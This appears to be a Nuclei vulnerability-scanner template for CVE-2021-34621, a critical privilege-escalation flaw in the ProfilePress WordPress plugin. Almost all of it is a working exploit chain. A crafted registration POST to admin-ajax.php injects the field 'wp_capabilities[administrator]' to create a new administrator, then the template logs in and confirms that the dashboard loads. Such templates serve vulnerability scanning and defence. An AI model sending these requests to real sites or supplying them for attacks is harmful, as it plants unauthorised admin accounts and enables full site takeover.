id: CVE-2021-34621 info: name: WordPress ProfilePress wp-user-avatar plugin make admin users author: 0xsapra severity: critical reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin tags: cve,cve2021,wordpress,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-34621 cwe-id: CWE-269 description: "A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. ." requests: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 Origin: {{BaseURL}} Referer: {{BaseURL}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_username" {{randstr}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_email" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password_present" true -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_first_name" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_last_name" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="_wp_http_referer" /wp/?page_id=18 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="pp_current_url" {{BaseURL}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="wp_capabilities[administrator]" 1 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="signup_form_id" 1 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="signup_referrer_page" -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="action" pp_ajax_signup -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="melange_id" -----------------------------138742543134772812001999326589-- - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{BaseURL}} log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In - | GET /wp-admin/ HTTP/1.1 Host: {{Hostname}} Accept: */* Connection: close cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "Welcome to your WordPress Dashboard" - type: status status: - 200